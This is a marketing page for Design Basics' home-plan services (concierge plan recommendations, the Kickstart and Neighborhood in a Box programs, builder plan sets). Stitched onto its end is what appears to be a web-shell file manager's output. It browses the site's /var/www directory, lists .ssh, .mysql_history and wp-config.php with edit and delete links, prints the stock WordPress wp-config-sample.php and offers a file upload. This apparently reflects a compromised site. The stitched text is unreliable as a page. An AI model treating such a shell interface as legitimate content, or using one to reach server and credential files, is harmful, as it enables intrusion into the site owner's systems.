Adding new home plans to your portfolio is risky. Will the design attract buyers? How much will that home cost to build?

Design Basics’ Concierge Service is designed to help you minimize such risks. We know what is selling in terms of home design. Based on your goals (e.g., affordability); restrictions (e.g., 40-foot maximum building widths); and target market or specific customer needs (e.g. multi-generational households); we can recommend popular home designs that improve your odds of success.

After discussing what you are looking for in a home design, we’ll research our entire library of home plans to recommend top designs that meet your needs, saving you time! While it is easy for everyone to search home designs on our website, with heightened knowledge of our plans and search methodologies, our plan specialists often identify ideal home designs that may otherwise be missed or overlooked. In addition, we may recognize that a certain plan, with minor modifications, might be exactly what you are looking for.

What is the value of working with a plan specialist? You may have the requisite accounting knowledge and software, but you work with a CPA. You might be tech-savvy, but you hire a website design company. Residential design is a similar specialty. Is that neat amenity a fad, or destined to become a “must-have”? Was the home value-engineered, helping with your budget concerns? Our plan specialists are your home design consultants, tailoring recommendations and solutions based on your situation and needs.

Upon request, we can even review your existing design portfolio to identify gaps and opportunities we feel could be better addressed through design to help you sell more homes. Over 60 million Americans live in multi-generational households. Which of your home designs address this market’s needs? You have four one-story homes, which account for half of your sales, yet they all have “snout” garages and the writing is on the wall – several new neighborhoods are requiring flush or recessed garages.

Kickstart Your Neighborhood℠

Design Basics is a builder-oriented home plan design firm. With our Kickstart Program, you can get up to five sets of construction drawings for estimating purposes per year for just $100 each, including the corresponding elevation and floorplan presentation artwork for marketing. You will also enjoy plan and product discounts, FREE upgrades, and more!

Neighborhood in a Box®

Our Neighborhood in a Box Program can save you 50% when buying four or more home plans! Choose from pre-configured neighborhoods or build your own when you choose from over 1,300 designs.

Builder Plan Sets

A great floor plan with multiple elevations. Create a cohesive look for your neighborhood with builder plan sets at a discounted price.

Multi-Elevation Plan Set

Sample Builder Plan Set (#42376)

In addition, our home plans can be licensed for construction on a single-build or unlimited-build basis. Your plan specialist will be happy to discuss ways to get the most for your home design investment. Contact us today about our individually-tailored Concierge Service: 800.947.7526

For more resources on thoughtful design: 

Cover Photo: <a href="https://www.freepik.com/photos/business">Business photo created by nensuria - www.freepik.com</a>

Current Dir: /var/www/designbasics/

[DIR]  .cache [ delete | rename ]
[DIR]  .local [ delete | rename ]
[FILE] .mysql_history [ edit | delete | rename ]
[DIR]  .ssh [ delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/designbasics/wp-config-sample.php

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'database_name_here' );

/** Database username */
define( 'DB_USER', 'username_here' );

/** Database password */
define( 'DB_PASSWORD', 'password_here' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
define( 'NONCE_SALT',       'put your unique phrase here' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Upload File: